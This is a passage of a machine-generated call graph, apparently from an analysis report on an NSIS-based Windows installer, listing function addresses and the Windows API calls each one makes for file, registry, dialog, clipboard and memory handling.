calls 4276->4277 4278 402b31 4277->4278 4278->4269 5167 4045ee 5168 404624 5167->5168 5169 4045fe 5167->5169 5171 404201 8 API calls 5168->5171 5170 40419a 19 API calls 5169->5170 5172 40460b SetDlgItemTextW 5170->5172 5173 404630 5171->5173 5172->5168 5174 4018ef 5175 401926 5174->5175 5176 402b3a 18 API calls 5175->5176 5177 40192b 5176->5177 5178 405814 71 API calls 5177->5178 5179 401934 5178->5179 5180 402770 5181 402b3a 18 API calls 5180->5181 5182 402777 FindFirstFileW 5181->5182 5183 40279f 5182->5183 5186 40278a 5182->5186 5184 4027a8 5183->5184 5188 405ed3 wsprintfW 5183->5188 5189 405f8c lstrcpynW 5184->5189 5188->5184 5189->5186 5190 4014f1 SetForegroundWindow 5191 4029c7 5190->5191 5192 4018f2 5193 402b3a 18 API calls 5192->5193 5194 4018f9 5193->5194 5195 405768 MessageBoxIndirectW 5194->5195 5196 401902 5195->5196 4434 405373 4435 405394 GetDlgItem GetDlgItem GetDlgItem 4434->4435 4436 40551d 4434->4436 4480 4041cf SendMessageW 4435->4480 4438 405526 GetDlgItem CreateThread CloseHandle 4436->4438 4439 40554e 4436->4439 4438->4439 4483 405307 OleInitialize 4438->4483 4440 405579 4439->4440 4442 405565 ShowWindow ShowWindow 4439->4442 4443 40559e 4439->4443 4444 405585 4440->4444 4445 4055d9 4440->4445 4441 405404 4446 40540b GetClientRect GetSystemMetrics SendMessageW SendMessageW 4441->4446 4482 4041cf SendMessageW 4442->4482 4450 404201 8 API calls 4443->4450 4448 4055b3 ShowWindow 4444->4448 4449 40558d 4444->4449 4445->4443 4453 4055e7 SendMessageW 4445->4453 4451 405479 4446->4451 4452 40545d SendMessageW SendMessageW 4446->4452 4456 4055d3 4448->4456 4457 4055c5 4448->4457 4454 404173 SendMessageW 4449->4454 4455 4055ac 4450->4455 4458 40548c 4451->4458 4459 40547e SendMessageW 4451->4459 4452->4451 4453->4455 4460 405600 CreatePopupMenu 4453->4460 4454->4443 4462 404173 SendMessageW 4456->4462 4461 405234 25 API calls 4457->4461 4464 40419a 19 API calls 4458->4464 4459->4458 4463 405fae 18 API calls 4460->4463 4461->4456 4462->4445 4465 405610 AppendMenuW 4463->4465 4466 40549c 4464->4466 4467 405640 TrackPopupMenu 4465->4467 4468 40562d GetWindowRect 4465->4468 4469 4054a5 ShowWindow 4466->4469 4470 4054d9 GetDlgItem SendMessageW 4466->4470 4467->4455 4471 40565b 4467->4471 4468->4467 4472 4054c8 4469->4472 4473 4054bb ShowWindow 4469->4473 4470->4455 4474 405500 SendMessageW SendMessageW 4470->4474 4475 405677 SendMessageW 4471->4475 4481 4041cf SendMessageW 4472->4481 4473->4472 4474->4455 4475->4475 4476 405694 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4475->4476 4478 4056b9 SendMessageW 4476->4478 4478->4478 4479 4056e2 GlobalUnlock SetClipboardData CloseClipboard 4478->4479 4479->4455 4480->4441 4481->4470 4482->4440 4484 4041e6 SendMessageW 4483->4484 4485 40532a 4484->4485 4488 401389 2 API calls 4485->4488 4489 405351 4485->4489 4486 4041e6 SendMessageW 4487 405363 OleUninitialize 4486->4487 4488->4485 4489->4486 4490 402573 4491 402b1d 18 API calls 4490->4491 4493 402582 4491->4493 4492 4026a0 4493->4492 4494 4025c8 ReadFile 4493->4494 4495 405c7b ReadFile 4493->4495 4496 4026a2 4493->4496 4497 402608 MultiByteToWideChar 4493->4497 4499 40262e SetFilePointer MultiByteToWideChar 4493->4499 4501 4026b3 4493->4501 4494->4492 4494->4493 4495->4493 4502 405ed3 wsprintfW 4496->4502 4497->4493 4499->4493 4500 4026d4 SetFilePointer 4500->4492 4501->4492 4501->4500 4502->4492 5197 401df3 5198 402b3a 18 API calls 5197->5198 5199 401df9 5198->5199 5200 402b3a 18 API calls 5199->5200 5201 401e02 5200->5201 5202 402b3a 18 API calls 5201->5202 5203 401e0b 5202->5203 5204 402b3a 18 API calls 5203->5204 5205 401e14 5204->5205 5206 401423 25 API calls 5205->5206 5207 401e1b ShellExecuteW 5206->5207 5208 401e4c 5207->5208 5214 100016b6 5215 100016e5 5214->5215 5216 10001b18 22 API calls 5215->5216 5217 100016ec 5216->5217 5218 100016f3 5217->5218 5219 100016ff 5217->5219 5220 10001272 2 API calls 5218->5220 5221 10001726 5219->5221 5222 10001709 5219->5222 5231 100016fd 5220->5231 5223 10001750 5221->5223 5224 1000172c 5221->5224 5225 1000153d 3 API calls 5222->5225 5228 1000153d 3 API calls 5223->5228 5227 100015b4 3 API calls 5224->5227 5226 1000170e 5225->5226 5229 100015b4 3 API calls 5226->5229 5230 10001731 5227->5230 5228->5231 5232 10001714 5229->5232 5233 10001272 2 API calls 5230->5233 5234 10001272 2 API calls 5232->5234 5235 10001737 GlobalFree 5233->5235 5236 1000171a GlobalFree 5234->5236 5235->5231 5237 1000174b GlobalFree 5235->5237 5236->5231 5237->5231 5238 10002238 5239 10002296 5238->5239 5240 100022cc 5238->5240 5239->5240 5241 100022a8 GlobalAlloc 5239->5241 5241->5239 4724 4026f9 4725 402700 4724->4725 4726 402972 4724->4726 4727 402b1d 18 API calls 4725->4727 4728 40270b 4727->4728 4729 402712 SetFilePointer 4728->4729 4729->4726 4730 402722 4729->4730 4732 405ed3 wsprintfW 4730->4732 4732->4726 5242 1000103d 5243 1000101b 5 API calls 5242->5243 5244 10001056 5243->5244 5245 402c7f 5246 402c91 SetTimer 5245->5246 5247 402caa 5245->5247 5246->5247 5248 402cf8 5247->5248 5249 402cfe MulDiv 5247->5249 5250 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5249->5250 5250->5248 5252 4014ff 5253 401507 5252->5253 5255 40151a 5252->5255 5254 402b1d 18 API calls 5253->5254 5254->5255 5256 401000 5257 401037 BeginPaint GetClientRect 5256->5257 5258 40100c DefWindowProcW 5256->5258 5260 4010f3 5257->5260 5261 401179 5258->5261 5262 401073 CreateBrushIndirect FillRect DeleteObject 5260->5262 5263 4010fc 5260->5263 5262->5260 5264 401102 CreateFontIndirectW 5263->5264 5265 401167 EndPaint 5263->5265 5264->5265 5266 401112 6 API calls 5264->5266 5265->5261 5266->5265 5267 401a00 5268 402b3a 18 API calls 5267->5268 5269 401a09 ExpandEnvironmentStringsW 5268->5269 5270 401a1d 5269->5270 5272 401a30 5269->5272 5271 401a22 lstrcmpW 5270->5271 5270->5272 5271->5272 5280 401b01 5281 402b3a 18 API calls 5280->5281 5282 401b08 5281->5282 5283 402b1d 18 API calls 5282->5283 5284 401b11 wsprintfW 5283->5284 5285 4029c7 5284->5285 4255 100027c7 4256 10002817 4255->4256 4257 100027d7 VirtualProtect 4255->4257 4257->4256 5286 401f08 5287 402b3a 18 API calls 5286->5287 5288 401f0f GetFileVersionInfoSizeW 5287->5288 5289 401f36 GlobalAlloc 5288->5289 5291 401f8c 5288->5291 5290 401f4a GetFileVersionInfoW 5289->5290 5289->5291 5290->5291 5292 401f59 VerQueryValueW 5290->5292 5292->5291 5293 401f72 5292->5293 5297 405ed3 wsprintfW 5293->5297 5295 401f7e 5298 405ed3 wsprintfW 5295->5298 5297->5295 5298->5291 5299 40498a 5300 4049b6 5299->5300 5301 40499a 5299->5301 5302 4049e9 5300->5302 5303 4049bc SHGetPathFromIDListW 5300->5303 5310 40574c GetDlgItemTextW 5301->5310 5305 4049cc 5303->5305 5309 4049d3 SendMessageW 5303->5309 5307 40140b 2 API calls 5305->5307 5306 4049a7 SendMessageW 5306->5300 5307->5309 5309->5302 5310->5306 5311 401c8e 5312 402b1d 18 API calls 5311->5312 5313 401c94 IsWindow 5312->5313 5314 4019f0 5313->5314 5315 1000164f 5316 10001516 GlobalFree 5315->5316 5318 10001667 5316->5318 5317 100016ad GlobalFree 5318->5317 5319 10001682 5318->5319 5320 10001699 VirtualFree 5318->5320 5319->5317 5320->5317 5321 401491 5322 405234 25 API calls 5321->5322 5323 401498 5322->5323 4526 402295 4527 402b3a 18 API calls 4526->4527 4528 4022a4 4527->4528 4529 402b3a 18 API calls 4528->4529 4530 4022ad 4529->4530 4531 402b3a 18 API calls 4530->4531 4532 4022b7 GetPrivateProfileStringW 4531->4532 4538 401f98 4539 40205c 4538->4539 4540 401faa 4538->4540 4542 401423 25 API calls 4539->4542 4541 402b3a 18 API calls 4540->4541 4543 401fb1 4541->4543 4549 402197 4542->4549 4544 402b3a 18 API calls 4543->4544 4545 401fba 4544->4545 4546 401fd0 LoadLibraryExW 4545->4546 4547 401fc2 GetModuleHandleW 4545->4547 4546->4539 4548 401fe1 4546->4548 4547->4546 4547->4548 4561 406362 WideCharToMultiByte 4548->4561 4552 401ff2 4554 402011 4552->4554 4555 401ffa 4552->4555 4553 40202b 4556 405234 25 API calls 4553->4556 4564 10001759 4554->4564 4606 401423 4555->4606 4557 402002 4556->4557 4557->4549 4559 40204e FreeLibrary 4557->4559 4559->4549 4562 40638c GetProcAddress 4561->4562 4563 401fec 4561->4563 4562->4563 4563->4552 4563->4553 4565 10001789 4564->4565 4609 10001b18 4565->4609 4567 10001790 4568 100018a6 4567->4568 4569 100017a1 4567->4569 4570 100017a8 4567->4570 4568->4557 4658 10002286 4569->4658 4641 100022d0 4570->4641 4575 1000180c 4579 10001812 4575->4579 4580 1000184e 4575->4580 4576 100017ee 4671 100024a9 4576->4671 4577 100017d7 4589 100017cd 4577->4589 4668 10002b5f 4577->4668 4578 100017be 4582 100017c4 4578->4582 4588 100017cf 4578->4588 4584 100015b4 3 API calls 4579->4584 4586 100024a9 10 API calls 4580->4586 4582->4589 4652 100028a4 4582->4652 4591 10001828 4584->4591 4592 10001840 4586->4592 4587 100017f4 4682 100015b4 4587->4682 4662 10002645 4588->4662 4589->4575 4589->4576 4595 100024a9 10 API calls 4591->4595 4605 10001895 4592->4605 4693 1000246c 4592->4693 4594 100017d5 4594->4589 4595->4592 4599 1000189f GlobalFree 4599->4568 4602 10001881 4602->4605 4697 1000153d wsprintfW 4602->4697 4603 1000187a FreeLibrary 4603->4602 4605->4568 4605->4599 4607 405234 25 API calls 4606->4607 4608 401431 4607->4608 4608->4557 4700 1000121b GlobalAlloc 4609->4700 4611 10001b3c 4701 1000121b GlobalAlloc 4611->4701 4613 10001d7a GlobalFree GlobalFree GlobalFree 4614 10001d97 4613->4614 4633 10001de1 4613->4633 4615 100020ee 4614->4615 4624 10001dac 4614->4624 4614->4633 4617 10002110 GetModuleHandleW 4615->4617 4615->4633 4616 10001c1d GlobalAlloc 4637 10001b47 4616->4637 4619 10002121 LoadLibraryW 4617->4619 4620 10002136 4617->4620 4618 10001c86 GlobalFree 4618->4637 4619->4620 4619->4633 4708 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4620->4708 4621 10001c68 lstrcpyW 4622 10001c72 lstrcpyW 4621->4622 4622->4637 4624->4633 4704 1000122c 4624->4704 4625 10002188 4627 10002195 lstrlenW 4625->4627 4625->4633 4709 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4627->4709 4628 10002148 4628->4625 4640 10002172 GetProcAddress 4628->4640 4629 10002048 4632 10002090 lstrcpyW 4629->4632 4629->4633 4632->4633 4633->4567 4634 10001cc4 4634->4637 4702 1000158f GlobalSize GlobalAlloc 4634->4702 4635 10001f37 GlobalFree 4635->4637 4636 100021af 4636->4633 4637->4613 4637->4616 4637->4618 4637->4621 4637->4622 4637->4629 4637->4633 4637->4634 4637->4635 4638 1000122c 2 API calls 4637->4638 4707 1000121b GlobalAlloc 4637->4707 4638->4637 4640->4625 4643 100022e8 4641->4643 4642 1000122c GlobalAlloc lstrcpynW 4642->4643 4643->4642 4645 10002415 GlobalFree 4643->4645 4647 100023d3 lstrlenW 4643->4647 4648 100023ba GlobalAlloc CLSIDFromString 4643->4648 4649 1000238f GlobalAlloc WideCharToMultiByte 4643->4649 4711 100012ba 4643->4711 4645->4643 4646 100017ae 4645->4646 4646->4577 4646->4578 4646->4589 4647->4645 4651 100023de 4647->4651 4648->4645 4649->4645 4651->4645 4715 100025d9 4651->4715 4653 100028b6 4652->4653 4654 1000295b VirtualAlloc 4653->4654 4655 10002979 4654->4655 4656 10002a75 4655->4656 4657 10002a6a GetLastError 4655->4657 4656->4589 4657->4656 4659 10002296 4658->4659 4660 100017a7 4658->4660 4659->4660 4661 100022a8 GlobalAlloc 4659->4661 4660->4570 4661->4659 4663 10002661 4662->4663 4664 100026b2 GlobalAlloc 4663->4664 4665 100026c5 4663->4665 4667 100026d4 4664->4667 4666 100026ca GlobalSize 4665->4666 4665->4667 4666->4667 4667->4594 4670 10002b6a 4668->4670 4669 10002baa GlobalFree 4670->4669 4718 1000121b GlobalAlloc 4671->4718 4673 10002530 StringFromGUID2 4678 100024b3 4673->4678 4674 10002541 lstrcpynW 4674->4678 4675 1000250b MultiByteToWideChar 4675->4678 4676 10002571 GlobalFree 4676->4678 4677 10002554 wsprintfW 4677->4678 4678->4673 4678->4674 4678->4675 4678->4676 4678->4677 4679 100025ac GlobalFree 4678->4679 4680 10001272 2 API calls 4678->4680 4719 100012e1 4678->4719 4679->4587 4680->4678 4723 1000121b GlobalAlloc 4682->4723 4684 100015ba 4685 100015c7 lstrcpyW 4684->4685 4687 100015e1 4684->4687 4688 100015fb 4685->4688 4687->4688 4689 100015e6 wsprintfW 4687->4689 4690 10001272 4688->4690 4689->4688 4691 100012b5 GlobalFree 4690->4691 4692 1000127b GlobalAlloc lstrcpynW 4690->4692 4691->4592 4692->4691 4694 1000247a 4693->4694 4696 10001861 4693->4696 4695 10002496 GlobalFree 4694->4695 4694->4696 4695->4694 4696->4602 4696->4603 4698 10001272 2 API calls 4697->4698 4699 1000155e 4698->4699 4699->4605 4700->4611 4701->4637 4703 100015ad 4702->4703 4703->4634 4710 1000121b GlobalAlloc 4704->4710 4706 1000123b lstrcpynW 4706->4633 4707->4637 4708->4628 4709->4636 4710->4706 4712 100012c1 4711->4712 4713 1000122c 2 API calls 4712->4713 4714 100012df 4713->4714 4714->4643 4716 100025e7 VirtualAlloc 4715->4716 4717 1000263d 4715->4717 4716->4717 4717->4651 4718->4678 4720 100012ea 4719->4720 4721 1000130c 4719->4721 4720->4721 4722 100012f0 lstrcpyW 4720->4722 4721->4678 4722->4721 4723->4684 5338 10001058 5340 10001074 5338->5340 5339 100010dd 5340->5339 5341 10001516 GlobalFree 5340->5341 5342 10001092 5340->5342 5341->5342 5343 10001516 GlobalFree 5342->5343 5344 100010a2 5343->5344 5345 100010b2 5344->5345 5346 100010a9 GlobalSize 5344->5346 5347 100010b6 GlobalAlloc 5345->5347 5348 100010c7 5345->5348 5346->5345 5349 1000153d 3 API calls 5347->5349 5350 100010d2 GlobalFree 5348->5350 5349->5348 5350->5339 5351 401718 5352 402b3a 18 API calls 5351->5352 5353 40171f SearchPathW 5352->5353 5354 40173a 5353->5354 4960 40159b 4961 402b3a 18 API calls 4960->4961 4962 4015a2 SetFileAttributesW 4961->4962 4963 4015b4 4962->4963 5355 40149e 5356 4014ac PostQuitMessage 5355->5356 5357 40223e 5355->5357 5356->5357 5365 4021a0 5366 402b3a 18 API calls 5365->5366 5367 4021a6 5366->5367 5368 402b3a 18 API calls 5367->5368 5369 4021af 5368->5369 5370 402b3a 18 API calls 5369->5370 5371 4021b8 5370->5371 5372 4062cf 2 API calls 5371->5372 5373 4021c1 5372->5373 5374 4021d2 lstrlenW lstrlenW 5373->5374 5375 4021c5 5373->5375 5377 405234 25 API calls 5374->5377 5376 405234 25 API calls 5375->5376 5379 4021cd 5375->5379 5376->5379 5378 402210 SHFileOperationW 5377->5378 5378->5375 5378->5379 5380 100010e1 5381 10001111 5380->5381 5382 100011d8 GlobalFree 5381->5382 5383 100012ba 2 API calls 5381->5383 5384 100011d3 5381->5384 5385 100011f8 GlobalFree 5381->5385 5386 10001272 2 API calls 5381->5386 5387 10001164 GlobalAlloc 5381->5387 5388 100012e1 lstrcpyW 5381->5388 5389 100011c4 GlobalFree 5381->5389 5383->5381 5384->5382 5385->5381 5386->5389 5387->5381 5388->5381 5389->5381 5390 401b22 5391 401b73 5390->5391 5392 401b2f 5390->5392 5393 401b78 5391->5393 5394 401b9d GlobalAlloc 5391->5394 5395 401bb8 5392->5395 5399 401b46 5392->5399 5400 40223e 5393->5400 5411 405f8c lstrcpynW 5393->5411 5396 405fae 18 API calls 5394->5396 5397 405fae 18 API calls 5395->5397 5395->5400 5396->5395 5402 402238 5397->5402 5409 405f8c lstrcpynW 5399->5409 5401 401b8a GlobalFree 5401->5400 5404 405768 MessageBoxIndirectW 5402->5404 5404->5400 5405 401b55 5410 405f8c lstrcpynW 5405->5410 5407 401b64 5412 405f8c lstrcpynW 5407->5412 5409->5405 5410->5407 5411->5401 5412->5400 5413 4029a2 SendMessageW 5414 4029bc InvalidateRect 5413->5414 5415 4029c7 5413->5415 5414->5415 4115 401924 4116 401926 4115->4116 4117 402b3a 18 API calls 4116->4117 4118 40192b 4117->4118 4121 405814 4118->4121 4157 405adf 4121->4157 4124 40583c DeleteFileW 4129 401934 4124->4129 4125 405853 4126 405973 4125->4126 4171 405f8c lstrcpynW 4125->4171 4126->4129 4201 4062cf FindFirstFileW 4126->4201 4128 405879 4130 40588c 4128->4130 4131 40587f lstrcatW 4128->4131 4192 405a23 lstrlenW 4130->4192 4133 405892 4131->4133 4135 4058a2 lstrcatW 4133->4135 4137 4058ad lstrlenW FindFirstFileW 4133->4137 4135->4137 4137->4126 4155 4058cf 4137->4155 4140 405956 FindNextFileW 4144 40596c FindClose 4140->4144 4140->4155 4141 4057cc 5 API calls 4143 4059ae 4141->4143 4145 4059b2 4143->4145 4146 4059c8 4143->4146 4144->4126 4145->4129 4149 405234 25 API calls 4145->4149 4147 405234 25 API calls 4146->4147 4147->4129 4151 4059bf 4149->4151 4150 405814 64 API calls 4150->4155 4153 405e26 40 API calls 4151->4153 4153->4129 4154 405234 25 API calls 4154->4155 4155->4140 4155->4150 4155->4154 4172 405f8c lstrcpynW 4155->4172 4173 4057cc 4155->4173 4181 405234 4155->4181 4196 405e26 4155->4196 4207 405f8c lstrcpynW 4157->4207 4159 405af0 4208 405a82 CharNextW CharNextW 4159->4208 4162 405834 4162->4124 4162->4125 4163 406220 5 API calls 4169 405b06 4163->4169 4164 405b37 lstrlenW 4165 405b42 4164->4165 4164->4169 4167 4059d7 3 API calls 4165->4167 4166 4062cf 2 API calls 4166->4169 4168 405b47 GetFileAttributesW 4167->4168 4168->4162 4169->4162 4169->4164 4169->4166 4170 405a23 2 API calls 4169->4170 4170->4164 4171->4128 4172->4155 4214 405bd3 GetFileAttributesW 4173->4214 4176 4057e7 RemoveDirectoryW 4178 4057f5 4176->4178 4177 4057ef DeleteFileW 4177->4178 4179 4057f9 4178->4179 4180 405805 SetFileAttributesW 4178->4180 4179->4155 4180->4179 4182 4052f1 4181->4182 4183 40524f 4181->4183 4182->4140 4184 40526b lstrlenW 4183->4184 4185 405fae 18 API calls 4183->4185 4186 405294 4184->4186 4187 405279 lstrlenW 4184->4187 4185->4184 4189 4052a7 4186->4189 4190 40529a SetWindowTextW 4186->4190 4187->4182 4188 40528b lstrcatW 4187->4188 4188->4186 4189->4182 4191 4052ad SendMessageW SendMessageW SendMessageW 4189->4191 4190->4189 4191->4182 4193 405a31 4192->4193 4194 405a43 4193->4194 4195 405a37 CharPrevW 4193->4195 4194->4133 4195->4193 4195->4194 4217 4062f6 GetModuleHandleA 4196->4217 4200 405e4e 4200->4155 4202 405998 4201->4202 4203 4062e5 FindClose 4201->4203 4202->4129 4204 4059d7 lstrlenW CharPrevW 4202->4204 4203->4202 4205 4059f3 lstrcatW 4204->4205 4206 4059a2 4204->4206 4205->4206 4206->4141 4207->4159 4209 405a9f 4208->4209 4211 405ab1 4208->4211 4209->4211 4212 405aac CharNextW 4209->4212 4210 405ad5 4210->4162 4210->4163 4211->4210 4213 405a04 CharNextW 4211->4213 4212->4210 4213->4211 4215 4057d8 4214->4215 4216 405be5 SetFileAttributesW 4214->4216 4215->4176 4215->4177 4215->4179 4216->4215 4218 406312 LoadLibraryA 4217->4218 4219 40631d GetProcAddress 4217->4219 4218->4219 4220 405e2d 4218->4220 4219->4220 4220->4200 4221 405caa lstrcpyW 4220->4221 4222 405cd3 4221->4222 4223 405cf9 GetShortPathNameW 4221->4223 4246 405bf8 GetFileAttributesW CreateFileW 4222->4246 4225 405e20 4223->4225 4226 405d0e 4223->4226 4225->4200 4226->4225 4228 405d16 wsprintfA 4226->4228 4227 405cdd CloseHandle GetShortPathNameW 4227->4225 4230 405cf1 4227->4230 4229 405fae 18 API calls 4228->4229 4231 405d3e 4229->4231 4230->4223 4230->4225 4247 405bf8 GetFileAttributesW CreateFileW 4231->4247 4233 405d4b 4233->4225 4234 405d5a GetFileSize GlobalAlloc 4233->4234 4235 405e19 CloseHandle 4234->4235 4236 405d7c 4234->4236 4235->4225 4248 405c7b ReadFile 4236->4248 4241 405d9b lstrcpyA 4243 405dbd 4241->4243 4242 405daf 4244 405b5d 4 API calls 4242->4244 4245 405df4 SetFilePointer WriteFile GlobalFree 4243->4245 4244->4243 4245->4235 4246->4227 4247->4233 4249 405c99 4248->4249 4249->4235 4250 405b5d lstrlenA 4249->4250 4251 405b9e lstrlenA 4250->4251 4252 405ba6 4251->4252 4253 405b77 lstrcmpiA 4251->4253 4252->4241 4252->4242 4253->4252 4254 405b95 CharNextA 4253->4254 4254->4251 5416 402224 5417 40222b 5416->5417 5420 40223e 5416->5420 5418 405fae 18 API calls 5417->5418 5419 402238 5418->5419 5421 405768 MessageBoxIndirectW 5419->5421 5421->5420 5422 4051a8 5423 4051b8 5422->5423 5424 4051cc 5422->5424 5425 4051be 5423->5425 5434 405215 5423->5434 5426 4051d4 IsWindowVisible 5424->5426 5432 4051eb 5424->5432 5429 4041e6 SendMessageW 5425->5429 5427 4051e1 5426->5427 5426->5434 5435 404afe SendMessageW 5427->5435 5428 40521a CallWindowProcW 5431 4051c8 5428->5431 5429->5431 5432->5428 5440 404b7e 5432->5440 5434->5428 5436 404b21 GetMessagePos ScreenToClient SendMessageW 5435->5436 5437 404b5d SendMessageW 5435->5437 5438 404b55 5436->5438 5439 404b5a 5436->5439 5437->5438 5438->5432 5439->5437 5449 405f8c lstrcpynW 5440->5449 5442 404b91 5450 405ed3 wsprintfW 5442->5450 5444 404b9b 5445 40140b 2 API calls 5444->5445 5446 404ba4 5445->5446 5451 405f8c lstrcpynW 5446->5451 5448 404bab 5448->5434 5449->5442 5450->5444 5451->5448 5452 402729 5453 402730 5452->5453 5454 4029c7 5452->5454 5455 402736 FindClose 5453->5455 5455->5454 5456 401cab 5457 402b1d 18 API calls 5456->5457 5458 401cb2 5457->5458 5459 402b1d 18 API calls 5458->5459 5460 401cba GetDlgItem 5459->5460 5461 4024e8 5460->5461 5469 4042ae lstrcpynW lstrlenW 5470 4016af 5471 402b3a 18 API calls 5470->5471 5472 4016b5 GetFullPathNameW 5471->5472 5473 4016f1 5472->5473 5474 4016cf 5472->5474 5475 401706 GetShortPathNameW 5473->5475 5476 4029c7 5473->5476 5474->5473 5477 4062cf 2 API calls 5474->5477 5475->5476 5478 4016e1 5477->5478 5478->5473 5480 405f8c lstrcpynW 5478->5480 5480->5473 5481 404bb0 GetDlgItem GetDlgItem 5482 404c02 7 API calls 5481->5482 5485 404e1b 5481->5485 5483 404ca5 DeleteObject 5482->5483 5484 404c98 SendMessageW 5482->5484 5486 404cae 5483->5486 5484->5483 5498 404afe 5 API calls 5485->5498 5502 404eff 5485->5502 5515 404e8c 5485->5515 5487 404ce5 5486->5487 5488 405fae 18 API calls 5486->5488 5489 40419a 19 API calls 5487->5489 5491 404cc7 SendMessageW SendMessageW 5488->5491 5494 404cf9 5489->5494 5490 404fab 5492 404fb5 SendMessageW 5490->5492 5493 404fbd 5490->5493 5491->5486 5492->5493 5503 404fd6 5493->5503 5504 404fcf ImageList_Destroy 5493->5504 5512 404fe6 5493->5512 5499 40419a 19 API calls 5494->5499 5495 404e0e 5496 404201 8 API calls 5495->5496 5501 4051a1 5496->5501 5497 404ef1 SendMessageW 5497->5502 5498->5515 5516 404d07 5499->5516 5500 404f58 SendMessageW 5500->5495 5506 404f6d SendMessageW 5500->5506 5502->5490 5502->5495 5502->5500 5507 404fdf GlobalFree 5503->5507 5503->5512 5504->5503 5505 405155 5505->5495 5510 405167 ShowWindow GetDlgItem ShowWindow 5505->5510 5509 404f80 5506->5509 5507->5512 5508 404ddc GetWindowLongW SetWindowLongW 5511 404df5 5508->5511 5517 404f91 SendMessageW 5509->5517 5510->5495 5513 404e13 5511->5513 5514 404dfb ShowWindow 5511->5514 5512->5505 5524 404b7e 4 API calls 5512->5524 5527 405021 5512->5527 5533 4041cf SendMessageW 5513->5533 5532 4041cf SendMessageW 5514->5532 5515->5497 5515->5502 5516->5508 5518 404dd6 5516->5518 5521 404d57 SendMessageW 5516->5521 5522 404d93 SendMessageW 5516->5522 5523 404da4 SendMessageW 5516->5523 5517->5490 5518->5508 5518->5511 5521->5516 5522->5516 5523->5516 5524->5527 5525 40512b InvalidateRect 5525->5505 5526 405141 5525->5526 5534 404ab9 5526->5534 5528 40504f SendMessageW 5527->5528 5531 405065 5527->5531 5528->5531 5530 4050d9 SendMessageW SendMessageW 5530->5531 5531->5525 5531->5530 5532->5495 5533->5485 5537 4049f0 5534->5537 5536 404ace 5536->5505 5538 404a09 5537->5538 5539 405fae 18 API calls 5538->5539 5540 404a6d 5539->5540 5541 405fae 18 API calls 5540->5541 5542 404a78 5541->5542 5543 405fae 18 API calls 5542->5543 5544 404a8e lstrlenW wsprintfW SetDlgItemTextW 5543->5544 5544->5536 4305 402331 4306 402337 4305->4306 4307 402b3a 18 API calls 4306->4307 4308 402349 4307->4308 4309 402b3a 18 API calls 4308->4309 4310 402353 RegCreateKeyExW 4309->4310 4311 402793 4310->4311 4312 40237d 4310->4312 4313 402398 4312->4313 4314 402b3a 18 API calls 4312->4314 4315 4023a4 4313->4315 4318 402b1d 18 API calls 4313->4318 4317 40238e lstrlenW 4314->4317 4316 4023bf RegSetValueExW 4315->4316 4322 403062 4315->4322 4320 4023d5 RegCloseKey 4316->4320 4317->4313 4318->4315 4320->4311 4323 403072 SetFilePointer 4322->4323 4324 40308e 4322->4324 4323->4324 4337 40317d GetTickCount 4324->4337 4327 403139 4327->4316 4328 405c7b ReadFile 4329 4030ae 4328->4329 4329->4327 4330 40317d 43 API calls 4329->4330 4331 4030c5 4330->4331 4331->4327 4332 40313f ReadFile 4331->4332 4334 4030d5 4331->4334 4332->4327 4334->4327 4335 405c7b ReadFile 4334->4335 4336 403108 WriteFile 4334->4336 4335->4334 4336->4327 4336->4334 4338 4032e7 4337->4338 4339 4031ac 4337->4339 4341 402d1a 33 API calls 4338->4341 4350 40330f SetFilePointer 4339->4350 4347 403095 4341->4347 4342 4031b7 SetFilePointer 4344 4031dc 4342->4344 4344->4347 4348 403271 WriteFile 4344->4348 4349 4032c8 SetFilePointer 4344->4349 4351 4032f9 4344->4351 4354 406432 4344->4354 4361 402d1a 4344->4361 4347->4327 4347->4328 4348->4344 4348->4347 4349->4338 4350->4342 4352 405c7b ReadFile 4351->4352 4353 40330c 4352->4353 4353->4344 4355 406457 4354->4355 4356 40645f 4354->4356 4355->4344 4356->4355 4357 4064e6 GlobalFree 4356->4357 4358 4064ef GlobalAlloc 4356->4358 4359 406566 GlobalAlloc 4356->4359 4360 40655d GlobalFree 4356->4360 4357->4358 4358->4355 4358->4356 4359->4355 4359->4356 4360->4359 4362 402d43 4361->4362 4363 402d2b 4361->4363 4366 402d53 GetTickCount 4362->4366 4367 402d4b 4362->4367 4364 402d34 DestroyWindow 4363->4364 4365 402d3b 4363->4365 4364->4365 4365->4344 4366->4365 4368 402d61 4366->4368 4369 40632f 2 API calls 4367->4369 4370 402d96 CreateDialogParamW ShowWindow 4368->4370 4371 402d69 4368->4371 4369->4365 4370->4365 4371->4365 4376 402cfe 4371->4376 4373 402d77 wsprintfW 4374 405234 25 API calls 4373->4374 4375 402d94 4374->4375 4375->4365 4377 402d0d 4376->4377 4378 402d0f MulDiv 4376->4378 4377->4378 4378->4373 5545 404635 5546 404661 5545->5546 5547 404672 5545->5547 5606 40574c GetDlgItemTextW 5546->5606 5549 40467e GetDlgItem 5547->5549 5554 4046dd 5547->5554 5551 404692 5549->5551 5550 40466c 5553 406220 5 API calls 5550->5553 5556 4046a6 SetWindowTextW 5551->5556 5561 405a82 4 API calls 5551->5561 5552 4047c1 5603 40496f 5552->5603 5608 40574c GetDlgItemTextW 5552->5608 5553->5547 5554->5552 5558 405fae 18 API calls 5554->5558 5554->5603 5559 40419a 19 API calls 5556->5559 5557 4047f1 5562 405adf 18 API calls 5557->5562 5563 404751 SHBrowseForFolderW 5558->5563 5564 4046c2 5559->5564 5560 404201 8 API calls 5565 404983 5560->5565 5566 40469c 5561->5566 5567 4047f7 5562->5567 5563->5552 5568 404769 CoTaskMemFree 5563->5568 5569 40419a 19 API calls 5564->5569 5566->5556 5570 4059d7 3 API calls 5566->5570 5609 405f8c lstrcpynW 5567->5609 5571 4059d7 3 API calls 5568->5571 5572 4046d0 5569->5572 5570->5556 5573 404776 5571->5573 5607 4041cf SendMessageW 5572->5607 5576 4047ad SetDlgItemTextW 5573->5576 5581 405fae 18 API calls 5573->5581 5576->5552 5577 4046d6 5579 4062f6 3 API calls 5577->5579 5578 40480e 5580 4062f6 3 API calls 5578->5580 5579->5554 5588 404816 5580->5588 5582 404795 lstrcmpiW 5581->5582 5582->5576 5585 4047a6 lstrcatW 5582->5585 5583 404855 5610 405f8c lstrcpynW 5583->5610 5585->5576 5586 40485e 5587 405a82 4 API calls 5586->5587 5589 404864 GetDiskFreeSpaceW 5587->5589 